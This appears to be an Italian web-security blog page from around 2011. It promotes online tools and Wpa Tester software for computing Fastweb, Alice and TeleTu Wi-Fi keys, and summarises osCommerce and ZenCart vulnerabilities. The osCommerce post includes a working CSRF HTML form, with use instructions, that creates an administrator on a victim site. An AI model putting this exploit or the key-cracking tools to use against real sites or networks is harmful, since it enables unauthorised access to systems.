Capn3m0 WebSecurity

Dopo le numerose richieste ricevute via email o dai vostri commenti abbiamo deciso di creare il nostro Tool on line che consente il calcolo delle chiavi Wpa Fastweb senza dover scaricare il software Wpa Tester o Wpa Calculator.

Il tool è stato pubblicato a questo link e per l’occasione abbiamo provveduto a ri-organizzare il Menu in alto. Allo stato attuale è stata creata la voce Tools nel quale sono stati raggruppati tutto ciò che è abbiamo sviluppato in questi anni.

Al momento troverete:

- Fastweb Wpa Calculator On Line per il calcolo delle chiavi Wpa dei Router Fastweb

- Md5 Encrypt/Decrypt Tool per criptare e decriptare gli hash MD5 usati prevalentemente per le passwords

- Wp-users-page plugin per WordPress per generare la lista dello Staff

A breve provvederemo a sviluppare anche lo script per il calcolo on line delle chiavi Wpa di Alice e di TeleTu.

Per ora vi invitiamo a testare il nostro tool per il calcolo delle Wpa Fastweb direttamente online e qualora dovessero verificarsi anomalie o errori contattateci.

PROVATELO QUI

N.B.

Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).

Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.

L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.

Pochi giorni fa avevamo pubblicato questo articolo dove veniva recensita la versione 1.6 del noto software Wpa Tester creato da Francesco Pompili per l’analisi, il calcolo e il crack delle reti Wifi di Telecom Alice e Fastweb.

Questa versione rispetto alle precedenti grazie all’aggiornamento del file “config.txt” permetteva di analizzare un numero maggiori di reti che fino a qualche tempo fa non permettevano di calcolare la chiave Wpa.

La nuova versione di cui andiamo a parlare oggi, rilasciata da qualche ora, è la versione 1.7 del Wpa Tester e integra il supporto al calcolo delle reti del Provider TeleTu finora rimasto in secondo piano.

Per quanto riguarda il cracking delle reti Alice e Fastweb non è stato aggiornato nulla pertanto l’unica vera differenza rispetto alla precedente versione è appunto il supporto a TeleTu.

Ancora una volta ringraziamo Francesco Pompili per il suo lavoro nello sviluppo di Wpa Tester.

Wpa Tester 1.7 DOWNLOAD

AGGIORNAMENTO 27/11/2011 – Le Wpa delle reti wireless Fastweb possono essere calcolate direttamente on line tramite il tool Fastweb Wpa Calculator OnLine.

AGGIORNAMENTO 29/11/2011 – Le Wpa delle reti wireless Alice possono essere calcolate direttamente on line tramite il tool Alice Wpa Calculator OnLine.

N.B.

Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).

Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.

L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.

Seguendo la scia di notizie degli ultimi tempi che han portato alla luce gravi vulnerabilità per le ultime versioni di OsCommerce (2.3.1) e ZenCart (1.3.9h) non poteva mancare all’appello anche l’ultimissima alpha release osCommerce 3.0.a5.

Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente “stabili” sono state bucate da molteplici vulnerabilità. Nella release specifica, che ripetiamo si tratta di una alpha, sono state individuate vulnerabilità di tipo Xss, Full Path Disclosure, Local File Inclusion e XSRF.

La Full Path Disclosure consiste nell’interrogare alcuni file del Template di OsCommerce che, andando in errore, mostrano a video la full path della loro posizione sul Server. Con questa sola informazione si può fare poco ma, anche in questo caso, se unita ad altri tipi di attacchi diventa una utile informazione. La XSS permette di iniettare codice JavaScript sfruttando una falla del file “products.php” mentre la Local File Inclusion consente di richiamare file presenti sul Server sfruttando la procedura di disinstallazione moduli del Cms che non verifica opportunamente i parametri passati e permette di accettare in input qualsiasi path raggiungibile.

Anche in questo caso c’è una falla più grave delle altre e a mio avviso è la XSRF che permette di inviare comandi all’applicativo senza che questi vengano verificati in alcun modo. Nel caso specifico sarà possibile creare un nuovo Admin sull’OsCommerce.

Basterà creare una pagina “.html” contenente il seguente codice:

<html>
<body>
<form action="http://<sito vittima>/admin/index.php?administrators&action=save" method="post">
<input type="text" name="user_name" value="<nomeutente>">
<input type="text" name="user_password" value="<password>">
<input type="text" name="modules[]" value="0?>
<input type="hidden" name="subaction" value="confirm"/>
<input type="submit" value="Save">
</form>
</body>
</html>

Ovviamente dovrete sostituire i seguenti parametri:

<sito vittima> con il dominio del sito in cui si vuole creare l’account

<nomeutente> con il nome utente del nuovo Admin

<password> con la password da associare al nuovo Admin

Una volta creata la pagina richiamatela dal vostro Browser e cliccate su “Save”.

Se tutto è andato a buon fine accedendo all’url:

http://<sito vittima>/admin/

potrete loggarvi come Admin con i dati appena inseriti.

Per informazioni dettagliate vi rimando al link del Dr. Alberto Fontanella autore dell’articolo.

osCommerce v3.0a5 [ Multiple Vulnerabilities ]

E’ ormai consuetudine che dopo l’individuazione di una nuova falla per OsCommerce a catena vengano individuate le stesse (o quasi) falle per ZenCart, altro noto Cms derivato dallo stesso OsCommerce.

La versione vulnerabile è l’ultima disponibile ossia la 1.3.9h e presenta vulnerabilità di vario tipo: Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File Upload.

La vulnerabilità Full Path Disclosure permette, se la gestione degli errori è configurata per mostrarli a video, di conoscere la path assoluta dell’applicativo. Di per sé non è una falla che consente di effettuare alcun tipo di azione ma l’informazione che si ottiene potrebbe essere utile se unita ad attacchi che vanno a scrivere sul FileSystem o similari. Le due XSS, invece, non affliggono l’attuale 1.3.9h ma tutte le versioni precedenti. Le vulnerabilità sono localizzate nel campo “Quantità” del carrello che permette l‘injection di codice XSS e nell’Area Amministrativa “Location/Taxes”. Per quest’ultima, quindi, si presume che si abbia già l’accesso Admin.

L’ultima vulnerabilità, la più grave, riguarda invece il componente Banner (banner_manager.php) che, così come per OsCommerce, permette di effettuare l’upload di files che verranno salvati nella cartella “images”.

Per informazioni dettagliate vi rimando al link del Dr. Alberto Fontanella autore dell’articolo.

Zen Cart <= v.1.3.9h [ Multiple Vulnerabilities ]

Come ricordete l’ultima volta che venne nominato l’ecommerce OsCommerce su questo sito era per segnalare una grave vulnerabilità presente in tutte le versioni. La falla era presente anche in diverse versioni di ZenCart in quanto derivato da OsCommerce stesso.

A distanza di 2 anni i programmatori, dopo una lunga latitanza, hanno rilasciato 2 nuove versioni: la 2.3.1 e la nuova 3.0.1. Il rilascio delle due nuove versioni non ha avuto molto risalto e tra gli utilizzatori di questo applicativo pochi hanno provveduto ad aggiornare.

Lo scorso 14 Maggio, però, è stata scoperta una nuova falla (purtoppo molto simile alla precedente) che permette l’upload di files nella cartella “/images” senza dover utilizzare tecniche particolari o rubare i dati di Amministratore.

[...]